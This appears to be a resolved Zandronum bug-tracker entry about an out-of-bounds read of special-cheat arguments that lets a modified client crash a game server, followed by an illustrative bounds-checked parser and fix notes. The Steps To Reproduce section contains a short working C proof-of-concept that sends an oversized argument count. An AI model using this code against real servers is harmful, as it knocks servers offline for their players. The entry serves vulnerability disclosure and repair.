ID: 0002694
Project: Zandronum
Category: [All Projects] Bug
View Status: public
Date Submitted: 2016-04-02 22:11
Last Update: 2017-02-17 10:09
Reporter: Dusk
Assigned To: Dusk
Priority: normal
Severity: exploit
Reproducibility: always
Status: resolved
Resolution: fixed
Product Version: 3.0-beta
Target Version: 3.0

Summary: 0002694: Modified client can crash the server using the special cheat

Description: The server reads in special args and stores them in an array of 5... but can read in more than 5 args. This can be exploited to crash the server. Since this is done in network reading code, sv_cheats does not have to be enabled.

Steps To Reproduce:

#include "c_dispatch.h"
CCMD (crashserver)
{
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, CLC_SPECIALCHEAT );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 10 );

    for ( unsigned int i = 0; i < 10; ++i )
        NETWORK_WriteLong( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
}
Attached Files: 2694-fix.diff (621 bytes) 2016-04-02 22:41

- Relationships
child of 0002620 (resolved, Dusk): the 'special' cheat does not work online
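
A bounds-checked reader for the message shape this report describes (special byte, argument count, then that many longs), added here as an illustration; it is not the contents of 2694-fix.diff or Zandronum's own code. The stream_t and special_cmd_t types, the function names and the little-endian long encoding are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_SPECIAL_ARGS 5 /* array size named in the report */

/* Hypothetical stand-ins for the server's byte stream and parsed command. */
typedef struct { const uint8_t *p, *end; } stream_t;
typedef struct { uint8_t special, argc; int32_t args[MAX_SPECIAL_ARGS]; } special_cmd_t;

static int read_byte(stream_t *s, uint8_t *out) {
    if (s->p >= s->end) return 0;              /* truncated packet */
    *out = *s->p++;
    return 1;
}

static int read_long(stream_t *s, int32_t *out) {
    if ((size_t)(s->end - s->p) < 4) return 0; /* truncated packet */
    *out = (int32_t)((uint32_t)s->p[0] | (uint32_t)s->p[1] << 8 |
                     (uint32_t)s->p[2] << 16 | (uint32_t)s->p[3] << 24); /* little-endian assumed */
    s->p += 4;
    return 1;
}

/* Returns 1 if the message parsed cleanly, 0 if it must be dropped. */
int parse_special_cheat(const uint8_t *buf, size_t len, special_cmd_t *cmd) {
    stream_t s = { buf, buf + len };
    memset(cmd, 0, sizeof *cmd);
    if (!read_byte(&s, &cmd->special) || !read_byte(&s, &cmd->argc)) return 0;
    /* argc is client-controlled: bound it before it drives writes into args[]. */
    if (cmd->argc > MAX_SPECIAL_ARGS) return 0;
    for (uint8_t i = 0; i < cmd->argc; ++i)
        if (!read_long(&s, &cmd->args[i])) return 0;
    return 1;
}

/* Constructed payloads (bytes after the command id): special, argc, then the longs. */
static const uint8_t sample_ok[] = { 123, 2, 7,0,0,0, 9,0,0,0 };
static const uint8_t sample_oversized[2 + 10 * 4] = { 123, 10 }; /* count 10, as in the report */
static const uint8_t sample_truncated[] = { 123, 3, 1,0,0,0 };   /* claims 3 longs, carries 1 */

int main(void) {
    special_cmd_t c;
    printf("ok=%d oversized=%d truncated=%d\n",
           parse_special_cheat(sample_ok, sizeof sample_ok, &c),
           parse_special_cheat(sample_oversized, sizeof sample_oversized, &c),
           parse_special_cheat(sample_truncated, sizeof sample_truncated, &c));
    return 0;
}
```

Rejecting the whole message when the count exceeds the array size, rather than silently clamping it, keeps the stream position consistent for whatever command follows.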

- Notes

(0014647) Dusk (developer) 2016-04-02 22:39
I've fixed this, but won't push till Monday since there's a testing event coming tomorrow. Diff attached.

(0014843) Edward-san (developer) 2016-05-08 21:00
Added with changeset: https://bitbucket.org/Torr_Samaho/zandronum/commits/b63775a6dd289626e3ac75aee8f6e68f0dd793a8


- Issue History
Date Modified Username Field Change
2016-04-02 22:11 Dusk New Issue
2016-04-02 22:12 Dusk Summary Client can crash the server using the special cheat => Modified client can crash the server using the special cheat
2016-04-02 22:19 Dusk Relationship added child of 0002620
2016-04-02 22:39 Dusk Note Added: 0014647
2016-04-02 22:40 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk File Deleted: 2694-fix.diff
2016-04-02 22:41 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk Assigned To => Dusk
2016-04-02 22:41 Dusk Status new => needs review
2016-05-08 21:00 Edward-san Note Added: 0014843
2016-05-08 21:00 Edward-san Status needs review => needs testing
2016-12-24 22:43 Dusk Target Version => 3.0
2017-02-17 10:09 Dusk Status needs testing => resolved
2017-02-17 10:09 Dusk Resolution open => fixed
2017-02-17 10:09 Dusk View Status private => public





